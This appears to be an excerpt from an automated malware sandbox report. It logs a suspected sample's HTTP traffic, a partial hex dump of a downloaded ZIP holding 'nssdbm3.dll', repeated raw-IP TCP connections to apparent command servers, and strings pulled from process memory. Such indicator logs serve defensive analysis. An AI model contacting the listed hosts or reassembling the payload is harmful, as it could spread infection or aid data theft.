6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:16:23 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:57 GMTETag: "61d8c845-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51

Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171

Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.facebook.com (Facebook)
Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","N equals www.twitter.com (Twitter)
Source: svchost.exe, 0000001D.00000003.809923692.00000188AC3A7000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 0000001D.00000003.809923692.00000188AC3A7000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-01-07T11:33:20.1626869Z\|\|.\|\|d5cdcec3-04df-404e-ba07-3240047c89f9\|\|1152921505694348672\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmp	String found in binary or memory: =strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"le
Source: svchost.exe, 0000001D.00000003.809893808.00000188AC396000.00000004.00000001.sdmp	String found in binary or memory: =strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0011"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Capabilities":["internetClient","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":104380919,"MaxInstallSizeInBytes":203345920,"PackageFormat":"Appx","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","MainPackageFamilyNameForDlc":null,"PackageFullName":"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0","PackageId":"3fbafb47-f476-4c26-4445-49acb9a726e6-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750754275328,"MinVersion":2814750710366559,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.isMain\":false,\"content.packageId\":\"SpotifyAB.SpotifyMusic_1.176.447.0_x86__zpdnekdrzrea0\",\"content.productId\":\"caac1b9d-621b-4f96-b143-e10e1397740a\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":2814750754275328,\"platform.minVersion\":2814750710366559,\"platform.target\":3}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Music\",\"optOut.backupRestore\":true,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3},{\"le
Source: 8EC4.exe, 00000028.00000002.980111699.0000000002C16000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.960951007.0000000002AF4000.00000004.00000001.sdmp, 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: 8EC4.exe, 00000028.00000002.1047119383.0000000002E66000.00000004.00000001.sdmp	String found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google 